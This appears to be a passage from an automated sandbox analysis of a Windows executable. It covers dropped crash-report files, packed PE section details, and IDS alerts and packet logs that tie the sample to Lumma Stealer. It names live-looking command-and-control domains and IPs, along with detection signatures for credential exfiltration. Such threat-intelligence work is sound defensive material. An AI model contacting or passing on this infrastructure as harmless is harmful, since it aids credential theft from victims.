                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.3.2.6.8.5.0.7.1.5.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.3.2.6.9.0.5.3.9.1.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.0.0.4.3.7.2.-.a.e.b.3.-.4.9.5.9.-.9.8.d.a.-.6.9.7.6.d.a.2.8.3.c.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.5.a.5.d.8.3.-.6.a.d.4.-.4.3.d.0.-.a.0.d.1.-.c.4.7.e.4.8.0.d.f.e.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.S.F.U.z.u.Y.P.G.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.4.-.0.0.0.1.-.0.0.1.3.-.7.5.2.8.-.7.c.f.2.0.d.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.4.9.8.d.7.1.d.d.5.b.4.8.2.e.9.d.a.0.9.b.5.a.5.d.5.8.7.0.9.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.4.9.8.9.7.9.3.2.5.2.2.9.c.5.4.9.4.a.0.1.f.d.d.d.7.e.8.0.1.3.7.5.0.a.5.c.e.7.!.j.S.F.U.z.u.Y.P.G.9...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C9C.tmp.dmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:41:08 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):296778
                                                                                                                                                                                                                                                                        Entropy (8bit):1.5044953878543896
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:F9NFyjLBB1fyWyS6y0HKeUdgIXAbEH7ITJtfqaYu:/yp+y06jbILbYu
                                                                                                                                                                                                                                                                        MD5:BA4DD9D6BA6E729046B2797D183C99CF
                                                                                                                                                                                                                                                                        SHA1:F1F23D5927D676C24C265095D7961144ACDAD025
                                                                                                                                                                                                                                                                        SHA-256:5F3AA81942B8F43B22C4E47C1120FD4B8417A7902D9207735AD7EBEDB5168A4E
                                                                                                                                                                                                                                                                        SHA-512:EBCC286B64690DD0E2D1261BB6886E93D6FE228239874A746A816C5B389639C2BA76C390758FD99D8DDD6A2CB5384669474141E73DCACFE8D024AE975A1D04D5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:MDMP..a..... .........ig.........................................'......4...............`.......8...........T............M...9...........)...........+..............................................................................eJ......8,......GenuineIntel............T.............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DD6.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8382
                                                                                                                                                                                                                                                                        Entropy (8bit):3.7109805799363778
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJS86L6YeISU9HGgmfCZZprP89b22sflZym:R6lXJR6L6YRSU9mgmfqU2VflN
                                                                                                                                                                                                                                                                        MD5:F9F6914B867697FCC3B80EAC9E29F571
                                                                                                                                                                                                                                                                        SHA1:EEFAB1DA695C4F20AEF6B95DA54F1AF0C543D04B
                                                                                                                                                                                                                                                                        SHA-256:FB331F6B4FCF7CF6DAAF1DCFAA2501BBB363755CF6B3378A32170F59C5C763EA
                                                                                                                                                                                                                                                                        SHA-512:8DBB09565B5D1B33F0595EBC9C7389DD3E64DDB953A38DA4129716B4A3B2819E717D5CB27DF7050793041ABBA1D5F94F81C9539A0B3588F226BCBF0BB16F7B68
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.2.8.<./.P.i.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E25.tmp.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4624
                                                                                                                                                                                                                                                                        Entropy (8bit):4.524479517481027
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsnYJg77aI9IjWpW8VY/WYm8M4JataKVFLuu+q8h86ZXax4UztDU5d:uIjfneI7yS7VeJOuuSXaxnzS5d
                                                                                                                                                                                                                                                                        MD5:F294DEA59C7F4333693724F36689A9A0
                                                                                                                                                                                                                                                                        SHA1:16C64CDF8559CD94E7395B7A1464D16BDD332112
                                                                                                                                                                                                                                                                        SHA-256:E5C8783F5D67B8D34148CB351B7BA04D971AA1B21F09F1E366CEE3965D9EE923
                                                                                                                                                                                                                                                                        SHA-512:FB4CFD7E6CAE933B36E14DF676F85BAA797DA9339D5AA1C09FBBCBED05214ACD2C85A657DACC3833F2EAEB9BE7C01947980A26A56354DFA9FE1D2E8DF8C85701
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643603" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.298825575077335
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:OECqOEmWfd+WQFIy/9026ZTyaRsCDusBqD5dooi8lrSD6VJSRYO:jCVL6seqD5SySWVARJ
                                                                                                                                                                                                                                                                        MD5:789AAF67EA0B47FFCBBD9E56001A8494
                                                                                                                                                                                                                                                                        SHA1:D42D3E813BA0162965F49502B23658F2955455DD
                                                                                                                                                                                                                                                                        SHA-256:3B0D1B4CDA2DEA9565C7E64616A182BE72AE28E7E3B79E834DE40F2EF91FCEDA
                                                                                                                                                                                                                                                                        SHA-512:6724EE331F7BA8F169768E17A5CCAA15A7A1A1A7DC9A0965774E1C5C795035521A00656DEFF9E126B142F28C36976966804C4019DC65136C22F3F07D82E59548
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr....U................................................................................................................................................................................................................................................................................................................................................3........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.51426597263154
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        File size:2'870'272 bytes
                                                                                                                                                                                                                                                                        MD5:820f418e980b172684fe96e4aa6e50a5
                                                                                                                                                                                                                                                                        SHA1:a5498979325229c5494a01fddd7e8013750a5ce7
                                                                                                                                                                                                                                                                        SHA256:06472667e63bfd7ffdf64b3de9b839207e2b0ab1ae17d60f6a6ad75d6fbd2800
                                                                                                                                                                                                                                                                        SHA512:b51717685d89a9f3e693157933449ae55803c5a6717f58aaa32da87f41c8af7f02629ddaf14212baa1fea57a8d76d0244eec0ba204e0e80d0fdd76d45d2f9b00
                                                                                                                                                                                                                                                                        SSDEEP:49152:HIuyataMx0UWqXz/dnL/RirQgyuPyskVLRlizFNFNjdyRZiP/Ww08:HIuyijx0/2LRL/RirQpuPnkTlgAjiP/J
                                                                                                                                                                                                                                                                        TLSH:5AD53AA2B54972CFD4CA16F89427CD8A595E03F8871148F7AD1C747ABEA3CC116B6C2C
                                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..........................................@..................................i,...@.................................T0..h..

                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Entrypoint:0x6ea000
                                                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        jmp 00007F4BA0E37D6Ah
                                                                                                                                                                                                                                                                        rsm
                                                                                                                                                                                                                                                                        sub eax, dword ptr [eax]
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        jmp 00007F4BA0E39D65h
                                                                                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax+eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        push es
                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        0x10000x510000x24800108e5ff974ff8cd1c1d13f1fe9631ffdFalse0.9974114404965754data7.9813529381203026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        trstwfmm0x540000x2950000x294c00bf5c807fb08ce7073286d6c7cbe897ceunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        ekycdelp0x2e90000x10000x40024e18729601be92642d3e89035d32268False0.8203125data6.3212326982952005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .taggant0x2ea0000x30000x2200fc5b824799d34e0f5b9bc245fe9b150dFalse0.058823529411764705DOS executable (COM)0.7886049500640178IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        kernel32.dlllstrcpy

                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2024-12-23T08:40:35.343969+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.11580571.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:35.718564+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.11654331.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:35.999353+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.11506651.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:36.142280+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.11546671.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:36.285155+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.11602531.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:36.428034+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.11511801.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:36.569423+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.11602771.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:36.727425+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.11552181.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:36.867809+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.11635901.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:38.549640+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.114970923.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:39.420367+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.114970923.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:40.997004+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149715104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:41.741365+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1149715104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:41.741365+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149715104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:42.981050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149721104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:44.039796+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1149721104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:44.039796+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149721104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:45.632810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149727104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:48.117262+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149733104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:48.992739+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1149733104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:50.552331+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149739104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:53.051762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149748104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:40:55.611278+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149755104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:00.848841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149767104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:01.601046+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149767104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:03.133628+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149772185.166.143.49443TCP
                                                                                                                                                                                                                                                                        2024-12-23T08:41:05.548672+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.114977752.216.152.124443TCP

                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.154144049 CET49709443192.168.2.1123.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.154206038 CET4434970923.55.153.106192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.154279947 CET49709443192.168.2.1123.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.158013105 CET49709443192.168.2.1123.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.158041954 CET4434970923.55.153.106192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:38.549503088 CET4434970923.55.153.106192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:38.549639940 CET49709443192.168.2.1123.55.153.106
